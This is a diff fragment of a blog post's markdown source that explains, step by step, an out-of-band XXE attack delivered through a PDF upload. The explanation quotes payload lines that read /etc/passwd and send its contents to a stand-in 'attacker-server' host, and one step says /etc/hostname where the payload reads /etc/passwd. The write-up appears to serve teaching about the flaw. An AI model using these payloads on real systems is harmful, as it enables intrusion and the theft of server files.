saurinn/saurinn.github.com/src/pages/blog/xxe-oob-via-a-pdf-upload.md

 ```
 3. `<!ENTITY % file SYSTEM "file:///etc/passwd">`: The parser reads this line from the remote DTD.
 It defines another parameter entity, %file, which is instructed to read the contents of the <code>/etc/hostname</code> file from the victim server's filesystem.

 4. `<!ENTITY % ent "<!ENTITY data SYSTEM 'https://attacker-server/?x=%file;'>">`: This is a nested entity.
-It defines a parameter entity <b>%ent</b> whose value is the full declaration for a general entity named <b>data</b>.
+It defines a parameter entity %ent, whose value is the full declaration for a general entity named <b>data</b>.
 This part is key because it ensures the file content (%file) is read and included within the URL of the final call.

 Back in the initial payload:

-5. `%ent;`: This line (3rd) triggers the processing of the %ent entity from the remote DTD, in simple terms, this action brings the final, exfil command (`&data;`) into play, setting up the last step of the attack.
+5. `%ent;`: This line (3rd) triggers the processing of the %ent entity from the remote DTD, in simple terms, this action brings the final, exfil command (&data;) into play, setting up the last step of the attack.

 6. `<root>&data;</root>`: The parser now resolves the `&data;` general entity.
 This triggers a final HTTP request to `https://attacker-server`.
 The content of the `/etc/passwd` file is appended as a URL parameter (`?x=%file;`), and the server sends this request successfully exfiltrating the data to the attacker's controlled domain.